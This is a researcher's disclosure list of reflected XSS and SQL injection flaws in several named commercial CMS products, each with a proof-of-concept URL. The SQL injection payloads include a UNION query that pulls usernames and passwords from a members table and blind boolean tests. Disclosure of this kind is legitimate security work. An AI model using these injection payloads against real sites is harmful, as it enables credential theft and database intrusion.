List of security vulnerabilities I have discovered
The list currently contains XSS and SQLi vulnerabilities in commercial web applications.
BGS CMS XSS:
Software: BGS CMS
Website: www.bgs-cms.com
Vulnerable URL: https://www.server/?action=search&search=[XSS]
PoC (Proof of Concept):
https://www.server/?action=search&search=<script>alert(String.fromCharCode(88,+83,+83));</script>
Anantasoft Gazelle CMS XSS:
Software: Anantasoft Gazelle CMS
Website: https://www.anantasoft.com
Vulnerable URL: https://www.server/search.php?lookup=[XSS]
PoC (Proof of Concept):
https://www.server/search.php?lookup=<script>alert(String.fromCharCode(88, 83, 83));</script>
Corvus CMS XSS:
Software: Corvus CMS
Website: https://www.corvuscms.hr/cms-rjesenja-24.aspx
Vulnerable URL: https://server/Content/Search.aspx?q=[XSS]
PoC (Proof of Concept):
https://www.server/Content/Search.aspx?q=<script>alert(String.fromCharCode(88, 83, 83));</script>
Spectrum Software WebManager CMS XSS:
Software: Spectrum Software WebManager CMS XSS
Website: https://www.spectrum.hr/proizvodi/web_manager_-_cms/default.aspx
Vulnerable URL: https://www.server/Search_1.aspx?pojam=[XSS]
PoC (Proof of Concept):
https://www.server/Search_1.aspx?pojam=<script>alert(String.fromCharCode(88,83, 83));</script>
Vito CMS SQL Injection:
Software: Vito CMS SQL Injection
Website: https://kameleon-lab.com/vito-cms.php
Vulnerable URL: https://server/duga_vest.php?id=1[SQLi]
PoC (Proof of Concept):
https://server/duga_vest.php?id=-217+UNION+SELECT+1,2,3,group_concat
(id,0x3a,username,0x3a,password,0x3a),5,6,7,8+from+members–
LINK CMS SQL Injection:
Software: LINK CMS SQL Injection
Website: https://www.link-softsolutions.com/SoftLink-Content-Management-System—CMS_20_1
Vulnerable URL: https://server/navigacija.php?jezik=lat&IDMeniGlavni=6
&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=63[SQLi]
PoC (Proof of Concept):
https://server/navigacija.php?jezik=lat&IDMeniGlavni=6&
IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=-63+UNION+SELECT+1,
CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4–
Clicker CMS Blind SQL Injection:
Software: Clicker CMS Blind SQL Injection
Website: n/a
Vulnerable URL: https://server/index.php?lang=4[BSQLi]
PoC (Proof of Concept):
https://server/index.php?lang=4 and substring(@@version,1,1)=5– (true or false)
https://server/index.php?lang=4 and substring(@@version,1,1)=4– (false or true)
Some of these have been published on sites that collect and verify reported security vulnerabilities: exploit-db.com, packetstormsecurity.org and secunia.com.
Today, most of this software has been patched.